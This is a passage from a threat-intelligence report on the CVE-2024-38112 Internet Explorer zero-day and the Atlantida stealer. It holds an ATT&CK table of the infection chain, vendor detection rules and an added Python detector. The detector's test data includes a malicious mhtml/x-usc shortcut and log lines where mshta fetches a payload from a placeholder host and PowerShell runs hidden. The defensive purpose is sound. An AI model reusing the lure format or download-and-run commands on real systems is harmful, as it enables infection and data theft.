CVE-2024-38112: Void Banshee targets Windows users via zombie Internet Explorer in zero-day attacks


Conclusion

As part of this campaign, we observed that even though users can no longer access IE, malicious actors can still leverage persistent Windows relics like IE on their machines to infect users and organizations with ransomware and backdoors, or to use the relic as a proxy for running other malware strains. The ability of APT groups like Void Banshee to exploit disabled services like IE poses a significant threat to organizations around the world. Because services like IE have a large attack surface and are no longer patched, this is a serious security concern for Windows users. Additionally, the ability of malicious actors to reach unsupported and disabled system services in order to bypass modern web sandboxes like IE mode for Microsoft Edge highlights a significant industry-wide concern.

To make software more secure and protect customers from zero-day attacks, Trend ZDI works with security researchers and vendors to responsibly disclose and patch software vulnerabilities before APT groups can deploy them in attacks. The ZDI Threat Hunting Team also proactively hunts for zero-day attacks in the wild to protect the industry. The ZDI program is the largest vendor-neutral bug bounty program in the world, disclosing vulnerabilities to vendors at a rate 2.5x higher.

Organizations can protect against these types of attacks with Trend Vision One™️, which enables security teams to continuously identify attack surfaces, including known, unknown, managed, and unmanaged cyber assets. Vision One helps organizations prioritize and manage potential risks, including vulnerabilities. It considers critical factors such as the likelihood and impact of potential attacks and offers a range of prevention, detection, and response capabilities. All of this is supported by advanced threat research, intelligence, and AI, which help reduce the time it takes to detect, respond, and remediate issues. Ultimately, Vision One can help improve an organization’s overall security posture and effectiveness, including against zero-day attacks.

When faced with intrusions, unexpected behaviors, or unknown routines, organizations should assume that their systems are already compromised and work to immediately isolate affected data or toolchains. With a broader perspective and rapid response, organizations can remediate breaches and protect their remaining systems, especially with technologies like Trend Micro Endpoint Security and Trend Micro Network Security, as well as comprehensive security solutions like Trend Micro™ XDR, which can detect, analyze, and block malicious content in the modern threat landscape.

Trend protections

The following protections exist to detect and protect Trend customers against CVE-2024-38112 (ZDI-CAN-24433) and against data exfiltration attempts by the Atlantida stealer used in this zero-day campaign.

Trend Vision One model

  • Microsoft Windows Remote Code Execution Vulnerability (ZDI-CAN-24433)
  • Svchost runs Iexplorer

Trend Micro Cloud One – Network Security and TippingPoint Filters

  • 44417 – ZDI-CAN-24433: Zero Day Initiative Vulnerability (Microsoft Windows)
  • 44453 – Trojan.Win32.AtlantidaStealer.A execution detected (geographic information)
  • 44454 – Trojan.Win32.AtlantidaStealer.A execution detected (data exfiltrated)

Trend Vision One Endpoint Security, Trend Cloud One – Workload and Endpoint Security, Deep Security and Vulnerability Protection IPS Rules

  • 1012075 – Microsoft Windows Remote Code Execution Vulnerability via SMB (ZDI-CAN-24433)
  • 1012074 – Microsoft Windows Remote Code Execution Vulnerability (ZDI-CAN-24433)

MITRE ATT&CK techniques

| Tactic | Technique | Context |
|---|---|---|
| Initial access | T1566.002 – Phishing: Spearphishing Link | The victim downloads a malicious ZIP archive |
| Execution | T1204.002 – User Execution: Malicious File | The victim executes an Internet shortcut file (.URL) that exploits CVE-2024-38112 |
| Defense evasion | T1218 – System Binary Proxy Execution | The MHTML and x-usc directive handler opens a compromised site in Internet Explorer |
| Compromised infrastructure | T1584.004 – Compromise Infrastructure: Server | The victim is redirected to a compromised site that downloads a malicious HTML application (.HTA) |
| Execution | T1204.002 – User Execution: Malicious File | The victim opens the HTA file |
| Execution | T1059.005 – Command and Scripting Interpreter: Visual Basic | The HTA application runs VBScript |
| Defense evasion | T1027 – Obfuscated Files or Information | The VBScript is obfuscated |
| Compromised infrastructure | T1584.004 – Compromise Infrastructure: Server | The VBScript downloads a malicious PowerShell script |
| Execution | T1059.001 – Command and Scripting Interpreter: PowerShell | The PowerShell script runs |
| Compromised infrastructure | T1584.004 – Compromise Infrastructure: Server | The PowerShell script downloads a malicious .NET loader |
| Defense evasion | T1027 – Obfuscated Files or Information | The .NET loader is obfuscated |
| Privilege escalation | T1055 – Process Injection | Atlantida uses process injection to gain persistence |
| Execution | T1218.009 – System Binary Proxy Execution: Regsvcs/Regasm | Atlantida uses RegAsm.exe to execute malicious code |
| Collection | T1560.001 – Archive Collected Data: Archive via Utility | Atlantida encrypts data before exfiltrating it |
| Collection | T1005 – Data from Local System | Atlantida collects sensitive information from the local system |
| Collection | T1082 – System Information Discovery | Atlantida collects information about the victim's hardware |
| Collection | T1555.003 – Credentials from Password Stores: Credentials from Web Browsers | Atlantida collects sensitive data from web browsers, including Chrome extension data |
| Collection | T1113 – Screen Capture | Atlantida captures screenshots of the victim machine |
| Exfiltration | T1041 – Exfiltration Over C2 Channel | Void Banshee exfiltrates stolen data to its C&C server |
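As an added defensive example (not Trend Micro's code and not part of the original report), the following Python sketches two detections that map onto the technique table above: a check of Internet shortcut (.URL) files for the MHTML/x-usc target that starts the chain, and a process-lineage rule run over constructed process-creation log lines covering the svchost → iexplore → mshta → powershell → RegAsm steps (the first pair corresponds to the "Svchost runs Iexplorer" model listed above). The pipe-delimited log format, the file names, the `example.invalid` domains and the alert wording are constructed assumptions; map your own telemetry (Sysmon Event ID 1, EDR process events) onto the `ProcEvent` fields.

```python
"""Detection helpers for the CVE-2024-38112 / Atlantida chain.

Added example, not Trend Micro code. Log format and sample data are
constructed; .invalid domains are reserved and never resolve.
"""
import configparser
from dataclasses import dataclass
from typing import List

# --- 1. Internet shortcut (.URL) inspection -----------------------------
# The chain starts with a .URL file whose target uses the MHTML protocol
# handler plus an x-usc directive, which forces the page open in IE.
URL_SUSPECT_SCHEME = "mhtml:"
URL_SUSPECT_DIRECTIVE = "!x-usc:"


def scan_url_shortcut(text: str) -> List[str]:
    """Return findings for the body of a .URL (INI-style) file."""
    findings: List[str] = []
    # .URL files are INI files; only '=' is a delimiter, URLs contain ':'.
    parser = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    parser.read_string(text)
    if not parser.has_section("InternetShortcut"):
        return findings
    target = parser.get("InternetShortcut", "URL", fallback="").strip().lower()
    if target.startswith(URL_SUSPECT_SCHEME):
        findings.append("URL target uses mhtml: handler (IE launch)")
    if URL_SUSPECT_DIRECTIVE in target:
        findings.append("URL target carries !x-usc: directive")
    return findings


# Constructed sample shortcut bodies (lure domain is a reserved .invalid name).
SAMPLE_URL = """[InternetShortcut]
URL=mhtml:http://lure.example.invalid/page.html!x-usc:http://lure.example.invalid/page.html
IconFile=C:\\Windows\\System32\\shell32.dll
IconIndex=1
"""
BENIGN_URL = """[InternetShortcut]
URL=https://www.example.com/
IconIndex=0
"""


# --- 2. Process-lineage rule over process-creation events ---------------
@dataclass(frozen=True)
class ProcEvent:
    parent: str   # parent image file name
    image: str    # child image file name
    cmdline: str  # child command line


# Parent -> child pairs taken from the chain in the table above.
SUSPICIOUS_LINEAGE = {
    ("svchost.exe", "iexplore.exe"): "svchost spawned Internet Explorer (disabled browser revived via MHTML handler)",
    ("iexplore.exe", "mshta.exe"): "Internet Explorer launched the HTA host",
    ("mshta.exe", "powershell.exe"): "HTA script spawned PowerShell",
    ("powershell.exe", "regasm.exe"): "PowerShell launched RegAsm.exe (T1218.009 proxy execution)",
}


def parse_log(text: str) -> List[ProcEvent]:
    """Parse constructed 'parent|image|cmdline' lines; cmdline may contain '|'."""
    events = []
    for line in text.splitlines():
        if line.strip():
            parent, image, cmdline = line.split("|", 2)
            events.append(ProcEvent(parent, image, cmdline))
    return events


def detect_chain(events: List[ProcEvent]) -> List[str]:
    """Return one alert string per suspicious event."""
    alerts = []
    for ev in events:
        key = (ev.parent.lower(), ev.image.lower())
        if key in SUSPICIOUS_LINEAGE:
            alerts.append(f"{ev.parent} -> {ev.image}: {SUSPICIOUS_LINEAGE[key]}")
        # RegAsm.exe ships under the .NET Framework directory; a copy run from
        # a user-writable path (as the loader stage does) is worth a look.
        if key[1] == "regasm.exe" and "microsoft.net\\framework" not in ev.cmdline.lower():
            alerts.append(f"RegAsm.exe executed from outside the .NET Framework directory: {ev.cmdline}")
    return alerts


# Constructed telemetry: two benign lines mixed with the four-stage chain.
SAMPLE_LOG = """\
explorer.exe|iexplore.exe|"C:\\Program Files\\Internet Explorer\\iexplore.exe" https://intranet.example.invalid/
svchost.exe|iexplore.exe|"C:\\Program Files\\Internet Explorer\\iexplore.exe" -Embedding
iexplore.exe|mshta.exe|"C:\\Windows\\System32\\mshta.exe" http://lure.example.invalid/payload.hta
mshta.exe|powershell.exe|powershell.exe -w hidden -c "<redacted>"
powershell.exe|regasm.exe|C:\\Users\\victim\\AppData\\Local\\Temp\\RegAsm.exe /U loader.dll
services.exe|svchost.exe|C:\\Windows\\System32\\svchost.exe -k netsvcs
"""

if __name__ == "__main__":
    for finding in scan_url_shortcut(SAMPLE_URL):
        print("[URL]", finding)
    for alert in detect_chain(parse_log(SAMPLE_LOG)):
        print("[PROC]", alert)
```

The shortcut check fires only on the two properties the report attributes to the lure (the `mhtml:` handler and the `!x-usc:` directive), so an ordinary `https://` shortcut produces no findings; the lineage rule deliberately ignores `explorer.exe` launching `iexplore.exe`, which a user clicking a legacy shortcut can still produce, and keys on the COM-style launch from `svchost.exe` that the Vision One model also targets.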

Indicators of Compromise (IOC)

Download the full list of IOCs here.
